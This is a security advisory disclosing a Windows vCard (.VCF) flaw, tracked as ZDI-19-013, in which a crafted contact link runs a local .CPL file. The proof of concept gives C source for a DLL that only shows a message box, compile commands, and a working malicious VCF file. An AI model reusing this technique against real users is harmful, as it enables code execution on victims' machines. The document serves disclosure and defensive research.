[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[Vendor]
www.microsoft.com
[Product]
A VCF file is a standard file format for storing contact information for a person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI).
[Vulnerability Type]
Insufficient UI Warning Remote Code Execution
[CVE Reference]
ZDI-19-013
ZDI-CAN-6920
[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.
An attacker can leverage this vulnerability to execute code in the context of the current user.
[Exploit/POC]
1) create a directory and name it "http" this will house the .CPL executable file.
2) create a .CPL file and give it a website name, I named mine "www.hyp3rlinx.altervista.cpl"
or whatever website you wish so it can be referenced in the VCF file.
#include <windows.h>
/* hyp3rlinx */
/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/
void ms_vcf_0day(){
MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , MB_YESNO + MB_ICONQUESTION );
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
switch(fdwReason){
case DLL_PROCESS_ATTACH:{
ms_vcf_0day();
break;
}
case DLL_PROCESS_DETACH:{
ms_vcf_0day();
break;
}
case DLL_THREAD_ATTACH:{
ms_vcf_0day();
break;
}
case DLL_THREAD_DETACH:{
ms_vcf_0day();
break;
}
}
return TRUE;
}
3) make sure to rename the executable .DLL extension to a .CPL extension if you did not follow compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl
4) Create .VCF mail file I named mine "trickyDealC0der.vcf"
For the URL in the .VCF Mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
The Windows .VCF File content:
"trickyDealC0der.vcf"
BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-0000
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD
Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF file will traverse back one to the "http" directory where
our CPL executable file lives and KABOOM! :)
[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
[Network Access]
Remote
[POC Video URL]
https://vimeo.com/310684003Have your say!
You May Also Like
